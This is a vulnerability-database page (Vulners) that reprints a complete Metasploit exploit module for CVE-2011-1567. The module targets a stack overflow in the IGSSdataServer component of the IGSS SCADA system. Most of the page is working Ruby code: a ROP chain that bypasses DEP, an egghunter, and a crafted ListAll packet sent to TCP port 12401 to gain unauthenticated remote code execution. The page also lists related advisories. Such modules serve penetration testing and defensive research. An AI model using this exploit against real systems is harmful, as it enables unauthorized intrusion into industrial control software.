Vulners
Lucene search
7-Technologies IGSS IGSSdataServer.exe Stack Buffer Overflow
🗓️ 16 May 2011 19:02:05Reported by Luigi Auriemma, Lincoln, corelanc0d3r <[email protected]>, sinn3r <[email protected]>Type 
metasploit🔗 www.rapid7.com👁 52 Views
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | 7-Technologies IGSS <= v9.00.00 b11063 IGSSdataServer Stack Overflow | 16 May 201100:00 | – | zdt |
 | CVE-2011-1567 | 16 May 201100:00 | – | circl |
 | 7T Interactive Graphical SCADA System File Operations Buffer Overflows (CVE-2011-1567; CVE-2011-4050) | 15 May 201100:00 | – | checkpoint_advisories |
 | CVE-2011-1567 | 5 Apr 201115:00 | – | cve |
 | CVE-2011-1567 | 5 Apr 201115:00 | – | cvelist |
 | 7-Technologies IGSS 9.00.00 b11063 - 'IGSSdataServer.exe' Remote Stack Overflow (Metasploit) | 16 May 201100:00 | – | exploitdb |
| 7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow | 9 Jun 201106:04 | – | metasploit |
 | CVE-2011-1567 | 5 Apr 201115:19 | – | nvd |
 | 7T Interactive Graphical SCADA System Multiple Security Vulnerabilities | 28 Mar 201100:00 | – | openvas |
| 7T Interactive Graphical SCADA System Multiple Security Vulnerabilities | 28 Mar 201100:00 | – | openvas |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Egghunter
include Msf::Exploit::Remote::Tcp
def initialize(info={})
super(update_info(info,
'Name' => "7-Technologies IGSS IGSSdataServer.exe Stack Buffer Overflow",
'Description' => %q{
This module exploits a vulnerability in the igssdataserver.exe component of 7-Technologies
IGSS up to version 9.00.00 b11063. While processing a ListAll command, the application
fails to do proper bounds checking before copying data into a small buffer on the stack.
This causes a buffer overflow and allows to overwrite a structured exception handling record
on the stack, allowing for unauthenticated remote code execution. Also, after the payload
exits, IGSSdataServer.exe should automatically recover.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Luigi Auriemma', #Initial discovery, poc
'Lincoln', #Metasploit
'corelanc0d3r <peter.ve[at]corelan.be>', #Rop exploit, combined XP SP3 & 2003 Server
'sinn3r', #Serious Msf style policing
],
'References' =>
[
['CVE', '2011-1567'],
['OSVDB', '72353'],
['URL', 'http://aluigi.altervista.org/adv/igss_2-adv.txt'],
['URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-11-132-01A']
],
'Payload' =>
{
'BadChars' => "\x00",
},
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3/2003 Server R2 SP2 (DEP Bypass)',
{
'Ret' => 0x1b77ca8c, #dao360.dll pivot 1388 bytes
'Offset' => 500
}
],
],
'Privileged' => false,
'DisclosureDate' => '2011-03-24',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(12401)
])
end
def junk
return rand_text(4).unpack("L")[0].to_i
end
def exploit
eggoptions =
{
:checksum => false,
:eggtag => 'w00t',
:depmethod => 'virtualprotect',
:depreg => 'esi'
}
badchars = "\x00"
hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)
#dao360.dll - pvefindaddr rop 'n roll
rop_chain = [
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b72f174, # POP EAX # RETN 08
0xA1A10101,
0x1b7762a8, # ADD EAX,5E5F0000 # RETN 08
junk,
junk,
0x1b73a55c, # XCHG EAX,EBX # RETN
junk,
junk,
0x1b724004, # pop ebp
0x1b72f15f, # &push esp # retn 8
0x1b72f040, # POP ECX # RETN
0x1B78F010, # writeable
0x1b7681c2, # xor eax,eax # retn
0x1b72495c, # add al,40 # mov [esi+4],eax # pop esi # retn 4
0x41414141,
0x1b76a883, # XCHG EAX,ESI # RETN 00
junk,
0x1b7785c1, # XOR EDX,EDX # CMP EAX,54 # SETE DL # MOV EAX,EDX # ADD ESP,8 # RETN 0C
junk,
junk,
0x1b78535c, # ADD EDX,ESI # SUB EAX,EDX # MOV DWORD PTR DS:[ECX+F8],EAX # XOR EAX,EAX # POP ESI # RETN 10
junk,
junk,
junk,
junk,
0x1b7280b4, # POP EDI # XOR EAX,EAX # POP ESI # RETN
junk,
junk,
junk,
junk,
0x1b7681c4, # rop nop (edi)
0x90909090, # esi -> eax -> nop
0x1b72f174, # POP EAX # RETN 08
0xA1F50214, # offset to &VirtualProtect
0x1b7762a8, # ADD EAX,5E5F0000 # RETN 08
junk,
junk,
0x1b73f3bd, # MOV EAX,DWORD PTR DS:[EAX] # RETN
junk,
junk,
0x1b76a883, # XCHG EAX,ESI # RETN 00
0x1b72f040, # pop ecx
0x1B78F010, # writeable (ecx)
0x1b764716, # PUSHAD # RETN
].pack('V*')
header = "\x00\x04" #Size
header << "\x01\x00\x34\x12"
header << "\x0D" #Opcode
header << "\x00\x00\x00\x00\x00\x00\x00"
header << "\x01" #Flag
header << "\x00\x00\x00"
header << "\x01" #Command (ListAll)
header << "\x00\x00\x00"
header << rand_text(14)
sploit = rop_chain
sploit << "\x90" * 10
sploit << hunter
sploit << rand_text(target['Offset'] - (sploit.length))
sploit << [target.ret].pack('V')
sploit << egg
sploit << rand_text(2000)
connect
print_status("Sending request...")
sock.put(header + sploit)
handler
disconnect
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Feb 2022 23:22Current
0.6Low risk
Vulners AI Score0.6
CVSS 210
EPSS0.69618